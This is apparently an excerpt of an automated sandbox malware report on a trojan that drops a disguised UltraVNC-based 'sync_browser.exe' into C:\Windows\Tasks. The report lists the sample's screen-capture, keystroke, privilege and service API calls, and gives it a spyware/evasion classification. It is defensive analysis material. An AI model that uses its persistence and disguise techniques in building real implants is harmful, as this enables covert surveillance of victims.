                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C3770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,22_2_00007FF67E7C3770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E811550 GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,22_2_00007FF67E811550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,22_2_00007FF67E7D74C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,25_2_00007FF67E7D74C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D2E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_00007FF67E7D2E40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DA130 GetVersionExA,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,OpenProcess,OpenProcessToken,CloseHandle,GetModuleFileNameA,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,OpenEventA,SetEvent,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,OpenEventA,SetEvent,GetModuleFileNameA,GetDesktopWindow,ShellExecuteA,InitializeCriticalSection,Sleep,SetThreadDesktop,CloseDesktop,22_2_00007FF67E7DA130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,22_2_00007FF67E7D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,22_2_00007FF67E7D34B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,25_2_00007FF67E7D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,25_2_00007FF67E7D34B0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\id2rlx.MxYNRdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\wFUH4p.aEmodeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004057210_2_00405721
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004139D10_2_004139D1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00413AAB0_2_00413AAB
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004133700_2_00413370
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00413D430_2_00413D43
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040AD300_2_0040AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E36D022_2_00007FF67E7E36D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D027022_2_00007FF67E7D0270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7CC81022_2_00007FF67E7CC810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D974022_2_00007FF67E7D9740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DAF6022_2_00007FF67E7DAF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C377022_2_00007FF67E7C3770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EE78022_2_00007FF67E7EE780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E87DF8022_2_00007FF67E87DF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DC8D022_2_00007FF67E7DC8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D20E022_2_00007FF67E7D20E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D110022_2_00007FF67E7D1100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7CA91022_2_00007FF67E7CA910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D693022_2_00007FF67E7D6930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DA13022_2_00007FF67E7DA130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EA87022_2_00007FF67E7EA870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C188022_2_00007FF67E7C1880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DA89022_2_00007FF67E7DA890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DC09022_2_00007FF67E7DC090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D70B022_2_00007FF67E7D70B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C1DD022_2_00007FF67E7C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E6DD122_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D8E1022_2_00007FF67E7D8E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DE61022_2_00007FF67E7DE610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F3E2022_2_00007FF67E7F3E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E162022_2_00007FF67E7E1620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E4D7E22_2_00007FF67E7E4D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D859022_2_00007FF67E7D8590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DC5B022_2_00007FF67E7DC5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E81065022_2_00007FF67E810650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E265022_2_00007FF67E7E2650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F166022_2_00007FF67E7F1660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EAE7022_2_00007FF67E7EAE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E88068C22_2_00007FF67E88068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C4E8022_2_00007FF67E7C4E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E6BBD22_2_00007FF67E7E6BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DB3D022_2_00007FF67E7DB3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7BE222_2_00007FF67E7C7BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D93E022_2_00007FF67E7D93E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D4C1022_2_00007FF67E7D4C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E87E40022_2_00007FF67E87E400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EA42022_2_00007FF67E7EA420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7B3722_2_00007FF67E7C7B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7B7122_2_00007FF67E7C7B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DBB8022_2_00007FF67E7DBB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C439022_2_00007FF67E7C4390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D7B9022_2_00007FF67E7D7B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E739B22_2_00007FF67E7E739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7BA622_2_00007FF67E7C7BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E2CC022_2_00007FF67E7E2CC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F1CE022_2_00007FF67E7F1CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EDCF022_2_00007FF67E7EDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7CDCF022_2_00007FF67E7CDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D1D1022_2_00007FF67E7D1D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7DAD3022_2_00007FF67E7DAD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F346022_2_00007FF67E7F3460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E882C7022_2_00007FF67E882C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E888C9022_2_00007FF67E888C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F54A022_2_00007FF67E7F54A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F5CA022_2_00007FF67E7F5CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E51B722_2_00007FF67E7E51B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7CE1D022_2_00007FF67E7CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E8809F022_2_00007FF67E8809F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C79E922_2_00007FF67E7C79E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C420022_2_00007FF67E7C4200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7A1C22_2_00007FF67E7C7A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E5A3322_2_00007FF67E7E5A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7ED15022_2_00007FF67E7ED150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C517022_2_00007FF67E7C5170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EF98022_2_00007FF67E7EF980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D898022_2_00007FF67E7D8980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C81AD22_2_00007FF67E7C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EC2C022_2_00007FF67E7EC2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7ACF22_2_00007FF67E7C7ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E8312C022_2_00007FF67E8312C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7B0422_2_00007FF67E7C7B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EAB1022_2_00007FF67E7EAB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7F033022_2_00007FF67E7F0330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E623E22_2_00007FF67E7E623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E87725022_2_00007FF67E877250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7A5B22_2_00007FF67E7C7A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C227022_2_00007FF67E7C2270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E8A7022_2_00007FF67E7E8A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C3A9022_2_00007FF67E7C3A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C7A9A22_2_00007FF67E7C7A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7CC81025_2_00007FF67E7CC810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D974025_2_00007FF67E7D9740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DAF6025_2_00007FF67E7DAF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C377025_2_00007FF67E7C3770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EE78025_2_00007FF67E7EE780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E87DF8025_2_00007FF67E87DF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DC8D025_2_00007FF67E7DC8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D20E025_2_00007FF67E7D20E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D110025_2_00007FF67E7D1100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7CA91025_2_00007FF67E7CA910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D693025_2_00007FF67E7D6930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DA13025_2_00007FF67E7DA130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EA87025_2_00007FF67E7EA870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C188025_2_00007FF67E7C1880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DA89025_2_00007FF67E7DA890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DC09025_2_00007FF67E7DC090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D70B025_2_00007FF67E7D70B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C1DD025_2_00007FF67E7C1DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E6DD125_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E2DF325_2_00007FF67E7E2DF3
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D8E1025_2_00007FF67E7D8E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DE61025_2_00007FF67E7DE610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F3E2025_2_00007FF67E7F3E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E162025_2_00007FF67E7E1620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E4D7E25_2_00007FF67E7E4D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D859025_2_00007FF67E7D8590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DC5B025_2_00007FF67E7DC5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E36D025_2_00007FF67E7E36D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E81065025_2_00007FF67E810650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E265025_2_00007FF67E7E2650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F166025_2_00007FF67E7F1660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EAE7025_2_00007FF67E7EAE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E88068C25_2_00007FF67E88068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C4E8025_2_00007FF67E7C4E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E6BBD25_2_00007FF67E7E6BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DB3D025_2_00007FF67E7DB3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7BE225_2_00007FF67E7C7BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D93E025_2_00007FF67E7D93E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D4C1025_2_00007FF67E7D4C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E87E40025_2_00007FF67E87E400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EA42025_2_00007FF67E7EA420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7B3725_2_00007FF67E7C7B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7B7125_2_00007FF67E7C7B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DBB8025_2_00007FF67E7DBB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C439025_2_00007FF67E7C4390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D7B9025_2_00007FF67E7D7B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E739B25_2_00007FF67E7E739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7BA625_2_00007FF67E7C7BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F1CE025_2_00007FF67E7F1CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EDCF025_2_00007FF67E7EDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7CDCF025_2_00007FF67E7CDCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D1D1025_2_00007FF67E7D1D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7DAD3025_2_00007FF67E7DAD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F346025_2_00007FF67E7F3460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E882C7025_2_00007FF67E882C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E888C9025_2_00007FF67E888C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F54A025_2_00007FF67E7F54A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F5CA025_2_00007FF67E7F5CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E51B725_2_00007FF67E7E51B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7CE1D025_2_00007FF67E7CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E8809F025_2_00007FF67E8809F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C79E925_2_00007FF67E7C79E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C420025_2_00007FF67E7C4200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7A1C25_2_00007FF67E7C7A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E5A3325_2_00007FF67E7E5A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7ED15025_2_00007FF67E7ED150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C517025_2_00007FF67E7C5170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EF98025_2_00007FF67E7EF980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D898025_2_00007FF67E7D8980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C81AD25_2_00007FF67E7C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EC2C025_2_00007FF67E7EC2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7ACF25_2_00007FF67E7C7ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E8312C025_2_00007FF67E8312C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7B0425_2_00007FF67E7C7B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EAB1025_2_00007FF67E7EAB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7F033025_2_00007FF67E7F0330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E623E25_2_00007FF67E7E623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E87725025_2_00007FF67E877250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7A5B25_2_00007FF67E7C7A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C227025_2_00007FF67E7C2270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E8A7025_2_00007FF67E7E8A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7D027025_2_00007FF67E7D0270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C3A9025_2_00007FF67E7C3A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C7A9A25_2_00007FF67E7C7A9A
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF67E879500 appears 42 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF67E7C3730 appears 730 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF67E877C50 appears 60 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF67E82A3B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF67E7CAE30 appears 34 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF67E8770B4 appears 56 times
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: String function: 004026B0 appears 38 times
                          Source: WPSela.LSZr7V.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: WPSela.LSZr7V.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: WPSela.LSZr7V.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: WPSela.LSZr7V.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000003.1346462546.00000000025A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000000.1343987548.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exeBinary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
                          Source: 7q551ugrWe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: conhost.exe.6.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                          Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@56/62@7/1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,22_2_00007FF67E7D18A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,22_2_00007FF67E7D3550
